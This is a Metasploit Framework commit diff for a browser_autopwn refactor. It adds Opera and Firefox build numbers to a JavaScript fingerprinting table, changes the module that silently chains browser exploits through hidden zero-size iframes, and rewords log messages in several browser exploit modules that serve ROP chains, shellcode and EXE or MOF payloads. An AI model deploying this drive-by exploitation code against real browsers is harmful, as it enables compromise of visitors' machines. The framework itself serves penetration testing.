Merge branch 'bap-refactor' of https://github.com/jlee-r7/metasploit-framework into jlee-r7-bap-refactor
This commit is contained in:
commit
bef12478fc
|
@ -62,11 +62,19 @@ window.os_detect.getVersion = function(){
|
|||
// though I have not verfied this claim.
|
||||
switch (opera.buildNumber('inconspicuous')) {
|
||||
case "344": // opera-9.0-20060616.1-static-qt.i386-en-344
|
||||
case "1347": // Opera 9.80 / Ubuntu 10.10 (Karmic Koala)
|
||||
case "2091": // opera-9.52-2091.gcc3-shared-qt3.i386.rpm
|
||||
case "2444": // opera-9.60.gcc4-shared-qt3.i386.rpm
|
||||
case "2474": // Opera 9.63 / Debian Testing (Lenny)
|
||||
case "4102": // Opera 10.00 / Ubuntu 8.04 LTS (Hardy Heron)
|
||||
case "6386": // 10.61
|
||||
os_name = oses_linux;
|
||||
break;
|
||||
case "1074": // Opera 11.50 / Windows XP
|
||||
case "1100": // Opera 11.52 / Windows XP
|
||||
case "3445": // 10.61
|
||||
case "3516": // Opera 10.63 / Windows XP
|
||||
case "7730": // Opera 8.54 / Windows XP
|
||||
case "8502": // "Opera 9 Eng Setup.exe"
|
||||
case "8679": // "Opera_9.10_Eng_Setup.exe"
|
||||
case "8771": // "Opera_9.20_Eng_Setup.exe"
|
||||
|
@ -74,12 +82,21 @@ window.os_detect.getVersion = function(){
|
|||
case "8801": // "Opera_9.22_Eng_Setup.exe"
|
||||
case "10108": // "Opera_952_10108_en.exe"
|
||||
case "10467": // "Opera_962_en_Setup.exe"
|
||||
case "3445": // 10.61
|
||||
case "10476": // Opera 9.63 / Windows XP
|
||||
os_name = oses_windows;
|
||||
break;
|
||||
case "2480": // Opera 9.64 / FreeBSD 7.0
|
||||
os_name = oses_freebsd;
|
||||
break;
|
||||
case "6386": // 10.61
|
||||
os_name = oses_mac_osx;
|
||||
break;
|
||||
// A few are ambiguous, record them here
|
||||
case "1250":
|
||||
// Opera 9.80 / Windows XP
|
||||
// Opera 11.61 / Windows XP
|
||||
// Opera 11.61 / Debian 4.0 (Etch)
|
||||
break;
|
||||
//default:
|
||||
// document.write(opera.buildNumber('inconspicuous'));
|
||||
// break;
|
||||
|
@ -235,11 +252,13 @@ window.os_detect.getVersion = function(){
|
|||
} break;
|
||||
case "2008102918": ua_version = "2.0.0.18"; os_name = oses_windows; break;
|
||||
case "2008102920": ua_version = "3.0.4"; break;
|
||||
case "2008112309": ua_version = "3.0.4"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Iceweasel 3.0.4 / Debian Testing (Lenny)
|
||||
case "2008111317": ua_version = "3.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2008111318": ua_version = "3.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
|
||||
case "2008120119": ua_version = "2.0.0.19"; os_name = oses_windows; break;
|
||||
case "2008120121": ua_version = "3.0.5"; os_name = oses_linux; break;
|
||||
case "2008120122": ua_version = "3.0.5"; os_name = oses_windows; break;
|
||||
case "2008121623": ua_version = "2.0.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 2.0.0.19 / Ubuntu 8.04 LTS (Hardy Heron)
|
||||
case "2008121709": ua_version = "2.0.0.20"; os_name = oses_windows; break;
|
||||
case "2009011912": ua_version = "3.0.6"; os_name = oses_linux; break;
|
||||
case "2009011913": ua_version = "3.0.6"; os_name = oses_windows; break;
|
||||
|
@ -379,20 +398,20 @@ window.os_detect.getVersion = function(){
|
|||
case "20091216142458": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
|
||||
case "20091216142519": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
|
||||
case "2009121708": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "CentOS"; arch = arch_x86; break;
|
||||
case "2009122115": ua_version = "3.0.17"; break; // Can be either Mac or Linux
|
||||
case "2009122116": ua_version = "3.0.17"; os_name = oses_windows; break;
|
||||
case "20091221151141": ua_version = "3.5.7"; os_name = oses_mac_osx; break;
|
||||
case "20091221152502": ua_version = "3.5.7"; os_name = oses_linux; break;
|
||||
case "2009122115": ua_version = "3.0.17"; break; // Can be either Mac or Linux
|
||||
case "20091221164558": ua_version = "3.5.7"; os_name = oses_windows; break;
|
||||
case "2009122116": ua_version = "3.0.17"; os_name = oses_windows; break;
|
||||
case "2009122200": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "SUSE"; break;
|
||||
case "20091223231431": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "PCLunixOS"; arch = arch_x86; break;
|
||||
case "20100105194006": ua_version = "3.6.0.rc1"; os_name = oses_mac_osx; break;
|
||||
case "20100105194116": ua_version = "3.6.0.rc1"; os_name = oses_linux; break;
|
||||
case "20100105212446": ua_version = "3.6.0.rc1"; os_name = oses_windows; break;
|
||||
case "2010010604": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
|
||||
case "2010010605": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100106054534": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86
|
||||
case "20100106054634": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
|
||||
case "2010010605": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100106211825": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
|
||||
case "20100106212742": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break;
|
||||
case "20100106215614": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
|
||||
|
@ -451,8 +470,8 @@ window.os_detect.getVersion = function(){
|
|||
case "2010040116": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2010040118": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2010040119": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2010040121": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100401213457": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2010040121": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "2010040123": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "2010040200": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100402010516": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Mint"; arch = arch_x86_64; break;
|
||||
|
@ -533,6 +552,24 @@ window.os_detect.getVersion = function(){
|
|||
case "20100716093011": ua_version = "3.6.7.b2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20101203075014": ua_version = "3.6.13"; os_name = oses_windows; break;
|
||||
case "20101206122825": ua_version = "3.6.13"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
|
||||
case "20110318052756": ua_version = "4.0"; os_name = oses_windows; break; // browsershots: Firefox 4.0 / Windows XP
|
||||
case "20110420144310": ua_version = "3.5.19"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 3.5.19 / Debian 4.0 (Etch)
|
||||
case "20110615151330": ua_version = "5.0"; os_name = oses_windows; break; // browsershots: Firefox 5.0 / Windows XP
|
||||
case "20110811165603": ua_version = "6.0"; os_name = oses_windows; break; // browsershots: Firefox 6.0 / Windows XP
|
||||
case "20110830092941": ua_version = "6.0.1"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 6.0.1 / Debian 4.0 (Etch)
|
||||
case "20110922153450": ua_version = "7.0"; os_name = oses_windows; break; // browsershots: Firefox 7.0 / Windows XP
|
||||
case "20110928134238": ua_version = "7.0.1"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 7.0.1 / Debian 4.0 (Etch)
|
||||
case "20111104165243": ua_version = "8.0"; os_name = oses_windows; break; // browsershots: Firefox 8.0 / Windows XP
|
||||
case "20111115183813": ua_version = "8.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 8.0 / Ubuntu 9.10 (Karmic Koala)
|
||||
case "20111216140209": ua_version = "9.0"; os_name = oses_windows; break; // browsershots: Firefox 9.0 / Windows XP
|
||||
case "20120129021758": ua_version = "10.0"; os_name = oses_windows; break; // browsershots: Firefox 10.0 / Windows 2000
|
||||
case "20120201083324": ua_version = "3.5.16"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Iceweasel 3.5.16 / Debian 4.0 (Etch)
|
||||
case "20120216013254": ua_version = "3.6.27"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 3.6.27 / Debian 4.0 (Etch)
|
||||
case "20120216100510": ua_version = "10.0.2"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 10.0.2 / Ubuntu 9.10 (Karmic Koala)
|
||||
case "20120310010316": ua_version = "11.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 11.0 / Ubuntu 9.10 (Karmic Koala)
|
||||
case "20120310194926": ua_version = "11.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
|
||||
case "20120312181643": ua_version = "11.0"; os_name = oses_windows; break; // browsershots: Firefox 11.0 / Windows XP
|
||||
case "20120314195616": ua_version = "12.0"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 12.0 / Debian 4.0 (Etch)
|
||||
default:
|
||||
version = this.searchVersion("Firefox", navigator.userAgent);
|
||||
// Verify whether the ua string is lying by checking if it contains
|
||||
|
@ -644,6 +681,12 @@ window.os_detect.getVersion = function(){
|
|||
os_flavor = "XP";
|
||||
os_sp = "SP3";
|
||||
break;
|
||||
case "5722589":
|
||||
// browsershots.org, MSIE 7.0 / Windows XP
|
||||
ua_version = "7.0";
|
||||
os_flavor = "XP";
|
||||
// don't know what the service pack is =(
|
||||
break;
|
||||
case "576000":
|
||||
// IE 7.0.6000.16386, Vista Ultimate SP0 English
|
||||
ua_version = "7.0";
|
||||
|
|
|
@ -706,7 +706,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# Generic stuff that is needed regardless of what browser was detected.
|
||||
js << <<-ENDJS
|
||||
var written_iframes = new Array();
|
||||
function write_iframe(myframe) {
|
||||
window.write_iframe = function (myframe) {
|
||||
var iframe_idx; var mybody;
|
||||
for (iframe_idx in written_iframes) {
|
||||
if (written_iframes[iframe_idx] == myframe) {
|
||||
|
@ -718,7 +718,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
str += '<iframe src="' + myframe + '" style="visibility:hidden" height="0" width="0" border="0"></iframe>';
|
||||
document.body.innerHTML += (str);
|
||||
}
|
||||
function next_exploit(exploit_idx) {
|
||||
window.next_exploit = function (exploit_idx) {
|
||||
#{js_debug("'next_exploit(' + exploit_idx +')'")}
|
||||
if (!global_exploit_list[exploit_idx]) {
|
||||
#{js_debug("'End'")}
|
||||
|
@ -745,15 +745,15 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
if (eval(test)) {
|
||||
#{js_debug("'test says it is vuln, writing iframe for ' + global_exploit_list[exploit_idx].resource + '<br>'")}
|
||||
write_iframe(global_exploit_list[exploit_idx].resource);
|
||||
setTimeout("next_exploit(" + (exploit_idx+1).toString() + ")", 1000);
|
||||
window.write_iframe(global_exploit_list[exploit_idx].resource);
|
||||
setTimeout("window.next_exploit(" + (exploit_idx+1).toString() + ")", 1000);
|
||||
} else {
|
||||
#{js_debug("'this client does not appear to be vulnerable to ' + global_exploit_list[exploit_idx].resource + '<br>'")}
|
||||
next_exploit(exploit_idx+1);
|
||||
window.next_exploit(exploit_idx+1);
|
||||
}
|
||||
} catch(e) {
|
||||
#{js_debug("'test threw an exception: ' + e.message + '<br />'")}
|
||||
next_exploit(exploit_idx+1);
|
||||
window.next_exploit(exploit_idx+1);
|
||||
};
|
||||
}
|
||||
ENDJS
|
||||
|
@ -766,7 +766,12 @@ class Metasploit3 < Msf::Auxiliary
|
|||
@js_tests.each { |browser, sploits|
|
||||
next unless client_matches_browser(client_info, browser)
|
||||
|
||||
if (client_info.nil? || [nil, browser].include?(client_info[:ua_name]))
|
||||
# Send all the generics regardless of what the client is. If the
|
||||
# client is nil, then we don't know what it really is, so just err
|
||||
# on the side of shells and send everything. Otherwise, send only
|
||||
# if the client is using the browser associated with this set of
|
||||
# exploits.
|
||||
if (browser == "generic" || client_info.nil? || [nil, browser].include?(client_info[:ua_name]))
|
||||
sploits.each do |s|
|
||||
if s[:vuln_test].nil? or s[:vuln_test].empty?
|
||||
test = "is_vuln = true"
|
||||
|
@ -783,7 +788,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# victim. Note that host_info comes from javascript OS
|
||||
# detection, NOT the database.
|
||||
if host_info[:os_name] != "undefined"
|
||||
next unless s[:os_name].include?(host_info[:os_name])
|
||||
unless s[:os_name].include?(host_info[:os_name])
|
||||
vprint_status("Rejecting #{s[:name]} for non-matching OS")
|
||||
next
|
||||
end
|
||||
end
|
||||
end
|
||||
js << "global_exploit_list[global_exploit_list.length] = {\n"
|
||||
|
@ -832,8 +840,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
js << %Q|noscript_div.innerHTML = unescape(noscript_exploits);\n|
|
||||
js << %Q|document.body.appendChild(noscript_div);\n|
|
||||
|
||||
js << "#{js_debug("'starting exploits<br>'")}\n"
|
||||
js << "next_exploit(0);\n"
|
||||
js << "#{js_debug("'starting exploits (' + global_exploit_list.length + ' total)<br>'")}\n"
|
||||
js << "window.next_exploit(0);\n"
|
||||
|
||||
js = ::Rex::Exploitation::JSObfu.new(js)
|
||||
js.obfuscate
|
||||
|
@ -881,6 +889,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def client_matches_browser(client_info, browser)
|
||||
if client_info and browser and client_info[:ua_name]
|
||||
if browser != "generic" and client_info[:ua_name] != browser
|
||||
vprint_status("Rejecting exploits for #{browser}")
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
|
|
@ -144,7 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Both ROP chains generated by mona.py - See corelan.be
|
||||
case t['Rop']
|
||||
when :msvcrt
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} - Using msvcrt ROP")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Using msvcrt ROP")
|
||||
exec_size = code.length
|
||||
rop =
|
||||
[
|
||||
|
@ -169,7 +169,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
].pack("V*")
|
||||
|
||||
when :jre
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} - Using JRE ROP")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Using JRE ROP")
|
||||
exec_size = 0xffffffff - code.length + 1
|
||||
rop =
|
||||
[
|
||||
|
@ -243,23 +243,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Avoid the attack if the victim doesn't have the same setup we're targeting
|
||||
if my_target.nil?
|
||||
print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
|
||||
print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Browser not supported: #{agent}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} - Client requesting: #{request.uri}")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Client requesting: #{request.uri}")
|
||||
|
||||
# The SWF requests our MP4 trigger
|
||||
if request.uri =~ /\.mp4$/
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} - Sending MP4...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending MP4...")
|
||||
mp4 = create_mp4(my_target)
|
||||
send_response(cli, mp4, {'Content-Type'=>'video/mp4'})
|
||||
return
|
||||
end
|
||||
|
||||
if request.uri =~ /\.swf$/
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} - Sending Exploit SWF...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending Exploit SWF")
|
||||
send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })
|
||||
return
|
||||
end
|
||||
|
@ -323,7 +323,7 @@ pluginspage="http://www.macromedia.com/go/getflashplayer">
|
|||
|
||||
html = html.gsub(/^\t\t/, '')
|
||||
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending html")
|
||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||
end
|
||||
|
||||
|
|
|
@ -20,9 +20,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:ua_name => HttpClients::IE,
|
||||
:javascript => true,
|
||||
:rank => NormalRanking, # reliable memory corruption
|
||||
:vuln_test => nil,
|
||||
})
|
||||
|
||||
def initialize(info = {})
|
||||
|
@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
return if ((p = regenerate_payload(client)) == nil)
|
||||
|
||||
print_status("Sending #{self.name} exploit HTML to #{client.peerhost}:#{client.peerport}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML...")
|
||||
|
||||
shellcode = Rex::Text.to_unescape(p.encoded)
|
||||
|
||||
|
|
|
@ -19,6 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
# No particular browser. Works on at least IE6 and Firefox 1.5.0.3
|
||||
:javascript => true,
|
||||
:rank => NormalRanking, # reliable memory corruption
|
||||
:vuln_test => nil,
|
||||
|
@ -94,11 +95,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sploit << [target.ret].pack('V') + [0xe8, -485].pack('CV')
|
||||
|
||||
if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.qtl$/)
|
||||
print_status("Sending #{self.name} exploit to #{client.peerhost}:#{client.peerport}...")
|
||||
print_status("Trying target #{target.name}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit QTL file (target: #{target.name})")
|
||||
content = build_qtl(sploit)
|
||||
else
|
||||
print_status("Sending #{self.name} init HTML to #{client.peerhost}:#{client.peerport}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending init HTML")
|
||||
|
||||
shellcode = Rex::Text.to_unescape(p.encoded)
|
||||
url = ((datastore['SSL']) ? "https://" : "http://")
|
||||
|
|
|
@ -78,8 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return if ((p = regenerate_payload(client)) == nil)
|
||||
|
||||
if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.smil$/)
|
||||
print_status("Sending #{self.name} exploit to #{client.peerhost}:#{client.peerport}...")
|
||||
print_status("Trying target #{target.name}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit SMIL (target: #{target.name})")
|
||||
|
||||
# This is all basically filler on the browser target because we can't
|
||||
# expect the SEH to be in a reliable place across multiple browsers.
|
||||
|
@ -119,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
send_response(client, smil, { 'Content-Type' => "application/smil" })
|
||||
|
||||
else
|
||||
print_status("Sending #{self.name} init HTML to #{client.peerhost}:#{client.peerport}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending init HTML")
|
||||
|
||||
shellcode = Rex::Text.to_unescape(p.encoded)
|
||||
url = ((datastore['SSL']) ? "https://" : "http://")
|
||||
|
|
|
@ -21,9 +21,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:ua_name => HttpClients::IE,
|
||||
:javascript => true,
|
||||
:rank => NormalRanking,
|
||||
:vuln_test => nil,
|
||||
:classid => "{79956462-F148-497F-B247-DF35A095F80B}",
|
||||
:vuln_test => "DownloadImageFileURL",
|
||||
})
|
||||
|
||||
def initialize(info = {})
|
||||
|
@ -83,14 +85,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def on_request_uri(cli, request)
|
||||
|
||||
if request.uri.match(/\.EXE/)
|
||||
print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending EXE payload...")
|
||||
send_response(cli, @payload, { 'Content-Type' => 'application/octet-stream' })
|
||||
return
|
||||
elsif request.uri.match(/\.MOF/)
|
||||
return if @mof_name == nil or @payload_name == nil
|
||||
print_status("Generating mof...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Generating mof")
|
||||
mof = generate_mof(@mof_name, @payload_name)
|
||||
print_status("Sending MOF to #{cli.peerhost}:#{cli.peerport}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending MOF...")
|
||||
send_response(cli, mof, {'Content-Type'=>'application/octet-stream'})
|
||||
return
|
||||
end
|
||||
|
@ -135,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
#Clear the extra tabs
|
||||
content = content.gsub(/^\t\t/, '')
|
||||
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML")
|
||||
send_response_html(cli, content)
|
||||
handler(cli)
|
||||
|
||||
|
|
|
@ -17,14 +17,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:javascript => true,
|
||||
:rank => NormalRanking,
|
||||
:vuln_test => nil,
|
||||
})
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'EnjoySAP SAP GUI ActiveX Control Arbitrary File Download',
|
||||
|
|
|
@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if (request.uri.match(/payload/))
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
data = generate_payload_exe({ :code => p.encoded })
|
||||
print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending EXE payload")
|
||||
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
|
||||
return
|
||||
end
|
||||
|
@ -260,7 +260,8 @@ function #{var_func_exploit}( ) {
|
|||
|
||||
content = Rex::Text.randomize_space(content)
|
||||
|
||||
print_status("Sending #{self.name} exploit HTML to #{cli.peerhost}:#{cli.peerport}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML...")
|
||||
|
||||
|
||||
# Transmit the response to the client
|
||||
send_response_html(cli, content)
|
||||
|
|
|
@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML...")
|
||||
send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
|
||||
|
||||
# Handle the payload
|
||||
|
|
|
@ -128,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# check for non vulnerable targets
|
||||
if agent !~ /NT 5\.1/ or agent !~ /NT 6\.1/ and agent !~ /Firefox\/3\.6\.16/
|
||||
vprint_error("Target not supported: #{agent}")
|
||||
vprint_error("#{cli.peerhost.ljust(16)} #{self.shortname} Target not supported: #{agent}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
@ -346,7 +346,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
#Remove the extra tabs
|
||||
html = html.gsub(/^\t\t/, '')
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending HTML...")
|
||||
send_response_html(cli, html, { 'Content-Type' => 'text/html' })
|
||||
|
||||
# Handle the payload
|
||||
|
|
|
@ -222,7 +222,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def on_request_uri(cli, request)
|
||||
|
||||
if request.uri == get_resource() or request.uri =~ /\/$/
|
||||
print_status("#{self.refname}: Redirecting #{cli.peerhost}:#{cli.peerport}")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Redirecting to .html URL")
|
||||
redir = get_resource()
|
||||
redir << '/' if redir[-1,1] != '/'
|
||||
redir << rand_text_alphanumeric(4+rand(4))
|
||||
|
@ -230,7 +230,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
send_redirect(cli, redir)
|
||||
|
||||
elsif request.uri =~ /\.html?$/
|
||||
print_status("#{self.refname}: Sending HTML to #{cli.peerhost}:#{cli.peerport}")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending HTML")
|
||||
xul_name = rand_text_alpha(rand(100)+1)
|
||||
j_applet = rand_text_alpha(rand(100)+1)
|
||||
|
||||
|
@ -243,7 +243,7 @@ EOS
|
|||
send_response(cli, html, { 'Content-Type' => 'text/html' })
|
||||
|
||||
elsif request.uri =~ /\.xul$/
|
||||
print_status("#{self.refname}: Sending XUL to #{cli.peerhost}:#{cli.peerport}")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending XUL")
|
||||
|
||||
js_file = rand_text_alpha(rand(100)+1)
|
||||
@js_func = rand_text_alpha(rand(32)+1)
|
||||
|
@ -267,7 +267,7 @@ EOS
|
|||
send_response(cli, xul, { 'Content-Type' => 'application/vnd.mozilla.xul+xml' })
|
||||
|
||||
elsif request.uri =~ /\.js$/
|
||||
print_status("#{self.refname}: Sending JS to #{cli.peerhost}:#{cli.peerport}")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending JS")
|
||||
return if ((p = regenerate_payload(cli).encoded) == nil)
|
||||
|
||||
base_offset = (datastore['Crash'] != true) ? datastore['BaseOffset'] : 1
|
||||
|
|
|
@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
when /Windows NT/
|
||||
ret = target['Rets'][0]
|
||||
else
|
||||
print_status("Sending 404 to user agent: #{request['User-Agent']}")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending 404 to user agent: #{request['User-Agent']}")
|
||||
cli.send_response(create_response(404, 'File not found'))
|
||||
return
|
||||
end
|
||||
|
@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
"</object>" +
|
||||
"</html>"
|
||||
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML")
|
||||
|
||||
# Transmit the response to the client
|
||||
send_response_html(cli, content)
|
||||
|
|
|
@ -128,7 +128,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
mytarget = nil
|
||||
|
||||
agent = request.headers['User-Agent']
|
||||
#print_status("Checking user agent: #{agent}")
|
||||
if agent =~ /Windows NT 6\.0/
|
||||
mytarget = targets[2] # IE7 on Vista
|
||||
elsif agent =~ /MSIE 7\.0/
|
||||
|
@ -136,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
elsif agent =~ /MSIE 6\.0/
|
||||
mytarget = targets[1] # IE6 on NT, 2000, XP and 2003
|
||||
else
|
||||
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
|
||||
print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Unknown User-Agent #{agent}")
|
||||
end
|
||||
|
||||
mytarget
|
||||
|
@ -158,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending #{self.name} (target: #{mytarget.name})...")
|
||||
|
||||
# Encode the shellcode
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))
|
||||
|
|
|
@ -22,7 +22,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
:ua_maxver => "8.0",
|
||||
:javascript => true,
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:vuln_test => nil, # no way to test without just trying it
|
||||
# Not strictly a vuln check, but an exploitability check since a
|
||||
# specific version of .NET is required to make the ROP work.
|
